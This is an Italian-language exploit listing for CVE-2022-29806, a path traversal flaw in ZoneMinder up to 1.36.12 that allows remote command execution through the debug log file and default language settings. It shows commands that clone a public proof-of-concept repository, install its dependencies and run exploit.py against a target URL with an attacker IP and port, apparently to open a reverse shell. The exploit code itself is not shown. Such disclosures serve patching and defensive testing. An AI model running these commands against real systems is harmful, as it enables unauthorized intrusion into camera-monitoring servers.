
ZoneMinder fino alla 1.36.12 - escalation dei privilegi tramite Language (e RCE) - Exploit PoC
ZoneMinder fino alla 1.36.12 - escalation dei privilegi del linguaggio (e RCE)

Una vulnerabilità di Path Traversal nel file di log di debug e nell'opzione della lingua predefinita in ZoneMinder precedente alle versioni 1.36.13 e 1.37.11 consente agli attaccanti di scrivere ed eseguire codice arbitrario per ottenere l'esecuzione di comandi remoti.
"La prova di concetto è stata testata su ZoneMinder 1.36.4 ubuntu18.04 docker: ZoneMinder/zmdockerfiles, ma è comunque applicabile fino alla versione più recente 1.36.12"
git clone https://github.com/OP3R4T0R/CVE-2022-29806
cd CVE-2022-29806
python3 exploit.py
python3 exploit.py -t <target_url> -ip <attacker_ip> -p <port>
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>
pip3 install beautifulsoup4
pip3 install argparse
pip3 install requests
krastanoel ha scoperto la vulnerabilità.